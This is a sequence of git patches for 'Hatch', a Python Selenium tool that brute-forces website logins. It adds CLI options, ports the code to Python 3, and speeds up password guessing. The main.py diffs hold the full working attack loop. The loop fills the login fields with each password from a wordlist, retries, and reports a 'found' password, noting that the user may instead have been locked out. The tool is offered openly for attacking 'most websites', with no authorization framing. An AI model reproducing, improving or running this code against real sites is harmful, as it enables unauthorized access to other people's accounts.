From 726a02a639defff8ca5bf65a5d4f0aa44c0236f0 Mon Sep 17 00:00:00 2001 From: 3 <36322593+MetaChar@users.noreply.github.com> Date: Thu, 27 Dec 2018 16:48:45 -0700 Subject: [PATCH 01/12] Update README.md --- README.md | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 63abe85..8023d5b 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,18 @@ # Hatch Hatch is a brute force tool that is used to brute force most websites - +# Update! v.1.3 +added arg support **chears** + -h, --help show this help message and exit + -u USERNAME, --username=USERNAME + Choose the username + --usernamesel=USERNAMESEL + Choose the username selector + --passsel=PASSSEL Choose the password selector + --loginsel=LOGINSEL Choose the login button selector + --passlist=PASSLIST Enter the password list directory + --website=WEBSITE choose a website +dont worry if you load up the tool without any args youll go to the default wizard! ## Installation Instructions ``` git clone https://github.com/MetaChar/Hatch From 8e7ab1b7cfb2a67c80aca7b800be9d4609ed64e1 Mon Sep 17 00:00:00 2001 From: 3 <36322593+MetaChar@users.noreply.github.com> Date: Thu, 27 Dec 2018 16:49:32 -0700 Subject: [PATCH 02/12] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8023d5b..72e269d 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ Hatch is a brute force tool that is used to brute force most websites # Update! v.1.3 -added arg support **chears** +added arg support **yay** -h, --help show this help message and exit -u USERNAME, --username=USERNAME Choose the username From f45a8b4bbcbc0f40ef663ecaabf5fb89f19b6e91 Mon Sep 17 00:00:00 2001 From: 3 <36322593+MetaChar@users.noreply.github.com> Date: Thu, 27 Dec 2018 16:50:41 -0700 Subject: [PATCH 03/12] Update README.md --- README.md | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/README.md b/README.md index 72e269d..23430bd 100644 --- a/README.md +++ b/README.md @@ -3,15 +3,14 @@ Hatch is a brute force tool that is used to brute force most websites # Update! v.1.3 added arg support **yay** - -h, --help show this help message and exit - -u USERNAME, --username=USERNAME - Choose the username - --usernamesel=USERNAMESEL - Choose the username selector - --passsel=PASSSEL Choose the password selector - --loginsel=LOGINSEL Choose the login button selector - --passlist=PASSLIST Enter the password list directory - --website=WEBSITE choose a website +
+ -h, --help show this help message and exit
+ -u USERNAME, --username=USERNAME Choose the username
+ --usernamesel=USERNAMESEL Choose the username selector
+ --passsel=PASSSEL Choose the password selector
+ --loginsel=LOGINSEL Choose the login button selector
+ --passlist=PASSLIST Enter the password list directory
+ --website=WEBSITE choose a website
dont worry if you load up the tool without any args youll go to the default wizard! ## Installation Instructions ``` From 20050e44949646a3337f92d4671381d26beaf16d Mon Sep 17 00:00:00 2001 From: 3 <36322593+MetaChar@users.noreply.github.com> Date: Thu, 27 Dec 2018 16:52:16 -0700 Subject: [PATCH 04/12] Update README.md --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index 23430bd..d5ea3bf 100644 --- a/README.md +++ b/README.md @@ -12,6 +12,7 @@ added arg support **yay** --passlist=PASSLIST Enter the password list directory
--website=WEBSITE choose a website
dont worry if you load up the tool without any args youll go to the default wizard! +Also i removed the apt xvfb and pip2 pyvirtualdisplay ## Installation Instructions ``` git clone https://github.com/MetaChar/Hatch @@ -21,9 +22,7 @@ python2 main.py ## Requirements ``` pip2 install selenium -pip2 install pyvirtualdisplay pip2 install requests -sudo apt-get install xvfb ``` chrome driver and chrome are also required! link to chrome driver: http://chromedriver.chromium.org/downloads From 91b1912dac4a77bf03cad4241fc312ac3d6f43df Mon Sep 17 00:00:00 2001 From: 3 <36322593+MetaChar@users.noreply.github.com> Date: Thu, 27 Dec 2018 16:53:12 -0700 Subject: [PATCH 05/12] v.1.3 SEE README FOR INFO !!!!!!!!!!!! --- main.py | 116 ++++++++++++++++++++++++++++++++++++++++---------------- 1 file changed, 83 insertions(+), 33 deletions(-) diff --git a/main.py b/main.py index 23f71bc..39fef3e 100644 --- a/main.py +++ b/main.py @@ -1,24 +1,16 @@ # Coded by METACHAR # Looking to work with other hit me up on my email @metachar1@gmail.com <-- - -import datetime -from selenium import webdriver -from sys import stdout import sys -import time as t +import datetime +import selenium import requests -now = datetime.datetime.now() +import time as t +from sys import stdout +from selenium import webdriver +from optparse import OptionParser +from selenium.webdriver.common.keys import Keys from selenium.common.exceptions import NoSuchElementException -from pyvirtualdisplay import Display -display = Display(visible=1, size=(800, 800)) -display.start() -driver = webdriver.Chrome() -options = webdriver.ChromeOptions() -options.add_argument("--disable-popup-blocking") -options.add_argument("--disable-extensions") -count = 1 #count -driver.get('https://www.google.com') #Graphics class color: @@ -35,18 +27,24 @@ class color: CWHITE = '\33[37m' -banner = color.BOLD + color.RED +''' - _ _ _ _ - | | | | | | | | - | |__| | __ _| |_ ___| |__ - | __ |/ _` | __/ __| '_ \ - | | | | (_| | || (__| | | | - |_| |_|\__,_|\__\___|_| |_| - {0}[{1}-{2}]--> {3}V.1.0 - {4}[{5}-{6}]--> {7}coded by Metachar - {8}[{9}-{10}]-->{11} brute-force tool '''.format(color.RED, color.CWHITE,color.RED,color.GREEN,color.RED, color.CWHITE,color.RED,color.GREEN,color.RED, color.CWHITE,color.RED,color.GREEN) +#Config# +parser = OptionParser() +now = datetime.datetime.now() + + +#Args +parser.add_option("-u", "--username", dest="username",help="Choose the username") +parser.add_option("--usernamesel", dest="usernamesel",help="Choose the username selector") +parser.add_option("--passsel", dest="passsel",help="Choose the password selector") +parser.add_option("--loginsel", dest="loginsel",help= "Choose the login button selector") +parser.add_option("--passlist", dest="passlist",help="Enter the password list directory") +parser.add_option("--website", dest="website",help="choose a website") +(options, args) = parser.parse_args() + -def main(): + + +def wizard(): print (banner) website = raw_input(color.GREEN + color.BOLD + '\n[~] ' + color.CWHITE + 'Enter a website: ') sys.stdout.write(color.GREEN + '[!] '+color.CWHITE + 'Checking if site exists '), @@ -57,6 +55,8 @@ def main(): if request.status_code == 200: print (color.GREEN + '[OK]'+color.CWHITE) sys.stdout.flush() + except selenium.common.exceptions.NoSuchElementException: + pass except KeyboardInterrupt: print (color.RED + '[!]'+color.CWHITE+ 'User used Ctrl-c to exit') exit() @@ -66,26 +66,32 @@ def main(): t.sleep(1) print (color.RED + '[!]'+color.CWHITE+ ' Website could not be located make sure to use http / https') exit() - username_selector = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the username selector: ') + + username_selector = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the username selector: ') password_selector = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the password selector: ') login_btn_selector = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the Login button selector: ') username = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the username to brute-force: ') pass_list = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter a directory to a password list: ') + brutes(username, username_selector ,password_selector,login_btn_selector,pass_list, website) + +def brutes(username, username_selector ,password_selector,login_btn_selector,pass_list, website): f = open(pass_list, 'r') driver = webdriver.Chrome() - options = webdriver.ChromeOptions() - options.add_argument("--disable-popup-blocking") - options.add_argument("--disable-extensions") + optionss = webdriver.ChromeOptions() + optionss.add_argument("--disable-popup-blocking") + optionss.add_argument("--disable-extensions") count = 1 #count - browser = webdriver.Chrome(chrome_options=options) - browser.get(website) + browser = webdriver.Chrome(chrome_options=optionss) while True: try: for line in f: browser.get(website) + t.sleep(2) Sel_user = browser.find_element_by_css_selector(username_selector) #Finds Selector Sel_pas = browser.find_element_by_css_selector(password_selector) #Finds Selector enter = browser.find_element_by_css_selector(login_btn_selector) #Finds Selector + # browser.find_element_by_css_selector(password_selector).clear() + # browser.find_element_by_css_selector(username_selector).clear() Sel_user.send_keys(username) Sel_pas.send_keys(line) print '------------------------' @@ -93,5 +99,49 @@ def main(): print '------------------------' except KeyboardInterrupt: #returns to main menu if ctrl C is used exit() + except selenium.common.exceptions.NoSuchElementException: + print 'AN ELEMENT HAS BEEN REMOVED FROM THE PAGE SOURCE THIS COULD MEAN 2 THINGS THE PASSWORD WAS FOUND OR YOU HAVE BEEN LOCKED OUT OF ATTEMPTS! ' + print 'LAST PASS ATTEMPT BELLOW' + print color.GREEN + 'Password has been found: {0}'.format(line) + print color.YELLOW + 'Have fun :)' + exit() + + + +banner = color.BOLD + color.RED +''' + _ _ _ _ + | | | | | | | | + | |__| | __ _| |_ ___| |__ + | __ |/ _` | __/ __| '_ \\ + | | | | (_| | || (__| | | | + |_| |_|\__,_|\__\___|_| |_| + {0}[{1}-{2}]--> {3}V.1.0 + {4}[{5}-{6}]--> {7}coded by Metachar + {8}[{9}-{10}]-->{11} brute-force tool '''.format(color.RED, color.CWHITE,color.RED,color.GREEN,color.RED, color.CWHITE,color.RED,color.GREEN,color.RED, color.CWHITE,color.RED,color.GREEN) + +driver = webdriver.Chrome() +optionss = webdriver.ChromeOptions() +optionss.add_argument("--disable-popup-blocking") +optionss.add_argument("--disable-extensions") +count = 1 #count + +if options.username == None: + if options.usernamesel == None: + if options.passsel == None: + if options.loginsel == None: + if options.passlist == None: + if options.website == None: + wizard() + + +username = options.username +username_selector = options.usernamesel +password_selector = options.passsel +login_btn_selector = options.loginsel +website = options.website +pass_list = options.passlist +print banner +brutes(username, username_selector ,password_selector,login_btn_selector,pass_list, website) + + -main() From 2ac399cba7d39ca43c529c5fab19c327ed2ffd51 Mon Sep 17 00:00:00 2001 From: 3 <36322593+MetaChar@users.noreply.github.com> Date: Sun, 20 Jan 2019 16:14:28 -0700 Subject: [PATCH 06/12] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index d5ea3bf..1b891d9 100644 --- a/README.md +++ b/README.md @@ -37,5 +37,5 @@ copy it to bin! 6). Watch it go! ## How to use (Video) -[![IMAGE ALT TEXT](https://i.ytimg.com/vi/Hd_kQVnajxk/1.jpg)](https://youtu.be/Hd_kQVnajxk "Video Title") +[![IMAGE ALT TEXT](https://i.ytimg.com/vi/VNPGNbOzvq0/hqdefault.jpg)](https://youtu.be/Hd_kQVnajxk "Video Title") From 753b64d3f36971021cd023a540c16f976fc5faa6 Mon Sep 17 00:00:00 2001 From: 3 <36322593+MetaChar@users.noreply.github.com> Date: Sun, 20 Jan 2019 16:15:40 -0700 Subject: [PATCH 07/12] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1b891d9..a7e207e 100644 --- a/README.md +++ b/README.md @@ -37,5 +37,5 @@ copy it to bin! 6). Watch it go! ## How to use (Video) -[![IMAGE ALT TEXT](https://i.ytimg.com/vi/VNPGNbOzvq0/hqdefault.jpg)](https://youtu.be/Hd_kQVnajxk "Video Title") +[![IMAGE ALT TEXT](https://i.ytimg.com/vi/Hd_kQVnajxk/hqdefault.jpg?sqp=-oaymwEZCPYBEIoBSFXyq4qpAwsIARUAAIhCGAFwAQ==&rs=AOn4CLC7N67-Q67WAxMViUrHWJDdnkSM9A)](https://youtu.be/Hd_kQVnajxk "Video Title") From 938c0e8ed773fe5de94fbfc98f87a974c7ffd7be Mon Sep 17 00:00:00 2001 From: Bord Florian Date: Thu, 7 Mar 2019 16:32:51 +0100 Subject: [PATCH 08/12] Update for python3, upgrade performence --- main.py | 50 ++++++++++++++++++++++---------------------------- 1 file changed, 22 insertions(+), 28 deletions(-) diff --git a/main.py b/main.py index 39fef3e..8c679a7 100644 --- a/main.py +++ b/main.py @@ -10,6 +10,10 @@ from optparse import OptionParser from selenium.webdriver.common.keys import Keys from selenium.common.exceptions import NoSuchElementException +from selenium.webdriver.common.by import By +from selenium.webdriver.support.ui import WebDriverWait +from selenium.webdriver.support import expected_conditions as EC + #Graphics @@ -46,7 +50,7 @@ class color: def wizard(): print (banner) - website = raw_input(color.GREEN + color.BOLD + '\n[~] ' + color.CWHITE + 'Enter a website: ') + website = input(color.GREEN + color.BOLD + '\n[~] ' + color.CWHITE + 'Enter a website: ') sys.stdout.write(color.GREEN + '[!] '+color.CWHITE + 'Checking if site exists '), sys.stdout.flush() t.sleep(1) @@ -67,51 +71,47 @@ def wizard(): print (color.RED + '[!]'+color.CWHITE+ ' Website could not be located make sure to use http / https') exit() - username_selector = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the username selector: ') - password_selector = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the password selector: ') - login_btn_selector = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the Login button selector: ') - username = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the username to brute-force: ') - pass_list = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter a directory to a password list: ') + username_selector = input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the username selector: ') + password_selector = input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the password selector: ') + login_btn_selector = input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the Login button selector: ') + username = input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the username to brute-force: ') + pass_list = input(color.GREEN + '[~] ' + color.CWHITE + 'Enter a directory to a password list: ') brutes(username, username_selector ,password_selector,login_btn_selector,pass_list, website) def brutes(username, username_selector ,password_selector,login_btn_selector,pass_list, website): f = open(pass_list, 'r') - driver = webdriver.Chrome() optionss = webdriver.ChromeOptions() optionss.add_argument("--disable-popup-blocking") optionss.add_argument("--disable-extensions") - count = 1 #count browser = webdriver.Chrome(chrome_options=optionss) + wait = WebDriverWait(browser, 10) while True: try: for line in f: browser.get(website) - t.sleep(2) + wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, login_btn_selector))) Sel_user = browser.find_element_by_css_selector(username_selector) #Finds Selector Sel_pas = browser.find_element_by_css_selector(password_selector) #Finds Selector enter = browser.find_element_by_css_selector(login_btn_selector) #Finds Selector - # browser.find_element_by_css_selector(password_selector).clear() - # browser.find_element_by_css_selector(username_selector).clear() Sel_user.send_keys(username) Sel_pas.send_keys(line) - print '------------------------' + print ('------------------------') print (color.GREEN + 'Tried password: '+color.RED + line + color.GREEN + 'for user: '+color.RED+ username) - print '------------------------' + print ('------------------------') except KeyboardInterrupt: #returns to main menu if ctrl C is used - exit() + print('CTRL C') + break except selenium.common.exceptions.NoSuchElementException: - print 'AN ELEMENT HAS BEEN REMOVED FROM THE PAGE SOURCE THIS COULD MEAN 2 THINGS THE PASSWORD WAS FOUND OR YOU HAVE BEEN LOCKED OUT OF ATTEMPTS! ' - print 'LAST PASS ATTEMPT BELLOW' - print color.GREEN + 'Password has been found: {0}'.format(line) - print color.YELLOW + 'Have fun :)' + print ('AN ELEMENT HAS BEEN REMOVED FROM THE PAGE SOURCE THIS COULD MEAN 2 THINGS THE PASSWORD WAS FOUND OR YOU HAVE BEEN LOCKED OUT OF ATTEMPTS! ') + print ('LAST PASS ATTEMPT BELLOW') + print (color.GREEN + 'Password has been found: {0}'.format(line)) + print (color.YELLOW + 'Have fun :)') exit() - - banner = color.BOLD + color.RED +''' _ _ _ _ | | | | | | | | - | |__| | __ _| |_ ___| |__ + | |__| | __ _| |_ ___| |__ | __ |/ _` | __/ __| '_ \\ | | | | (_| | || (__| | | | |_| |_|\__,_|\__\___|_| |_| @@ -119,12 +119,6 @@ def brutes(username, username_selector ,password_selector,login_btn_selector,pas {4}[{5}-{6}]--> {7}coded by Metachar {8}[{9}-{10}]-->{11} brute-force tool '''.format(color.RED, color.CWHITE,color.RED,color.GREEN,color.RED, color.CWHITE,color.RED,color.GREEN,color.RED, color.CWHITE,color.RED,color.GREEN) -driver = webdriver.Chrome() -optionss = webdriver.ChromeOptions() -optionss.add_argument("--disable-popup-blocking") -optionss.add_argument("--disable-extensions") -count = 1 #count - if options.username == None: if options.usernamesel == None: if options.passsel == None: @@ -140,7 +134,7 @@ def brutes(username, username_selector ,password_selector,login_btn_selector,pas login_btn_selector = options.loginsel website = options.website pass_list = options.passlist -print banner +print (banner) brutes(username, username_selector ,password_selector,login_btn_selector,pass_list, website) From 7b57a3408864028c6a57d2c2e8c44a567e943cf6 Mon Sep 17 00:00:00 2001 From: Florian <30652375+FlorianBord2@users.noreply.github.com> Date: Thu, 7 Mar 2019 16:42:53 +0100 Subject: [PATCH 09/12] Update --- README.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/README.md b/README.md index a7e207e..c9cf352 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,13 @@ # Hatch Hatch is a brute force tool that is used to brute force most websites +# Update! recoed by FlroianBord2 +You can run Hatch with python3 now. +The main pupose of this fork is to improve number of password tested by second. +The orginal code call a two second scleep between each try, i replace this by the wait until presence of element located. +time.sleep(2) -> wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, login_btn_selector))) +The procces is two time faster with this modification. + # Update! v.1.3 added arg support **yay**
From 4c92c6847960d428cb25763f5ec0ef7a5a74e5a7 Mon Sep 17 00:00:00 2001 From: Florian <30652375+FlorianBord2@users.noreply.github.com> Date: Thu, 7 Mar 2019 16:44:53 +0100 Subject: [PATCH 10/12] Update README.md --- README.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index c9cf352..fed8110 100644 --- a/README.md +++ b/README.md @@ -3,10 +3,12 @@ Hatch is a brute force tool that is used to brute force most websites # Update! recoed by FlroianBord2 You can run Hatch with python3 now. -The main pupose of this fork is to improve number of password tested by second. -The orginal code call a two second scleep between each try, i replace this by the wait until presence of element located. +The main purpose of this fork is to improve the number of passwords tested by second. +The original code call a two-second sleep between each try, I replace this by the 'wait until presence of element located' + time.sleep(2) -> wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, login_btn_selector))) -The procces is two time faster with this modification. + +The process is two times faster with this modification. # Update! v.1.3 added arg support **yay** From bbf217bf1bb4662736033c58e4acb88fe6742287 Mon Sep 17 00:00:00 2001 From: Florian <30652375+FlorianBord2@users.noreply.github.com> Date: Thu, 7 Mar 2019 16:59:29 +0100 Subject: [PATCH 11/12] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index fed8110..ef7e63f 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # Hatch Hatch is a brute force tool that is used to brute force most websites -# Update! recoed by FlroianBord2 +# Update! recoded by FlroianBord2 You can run Hatch with python3 now. The main purpose of this fork is to improve the number of passwords tested by second. The original code call a two-second sleep between each try, I replace this by the 'wait until presence of element located' From f5d5456da196ec9dc5d3572a9a541bbd7184cc76 Mon Sep 17 00:00:00 2001 From: Florian <30652375+FlorianBord2@users.noreply.github.com> Date: Thu, 7 Mar 2019 16:59:57 +0100 Subject: [PATCH 12/12] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index ef7e63f..d7f54e3 100644 --- a/README.md +++ b/README.md @@ -25,13 +25,13 @@ Also i removed the apt xvfb and pip2 pyvirtualdisplay ## Installation Instructions ``` git clone https://github.com/MetaChar/Hatch -python2 main.py +python3 main.py ``` ## Requirements ``` -pip2 install selenium -pip2 install requests +pip3 install selenium +pip3 install requests ``` chrome driver and chrome are also required! link to chrome driver: http://chromedriver.chromium.org/downloads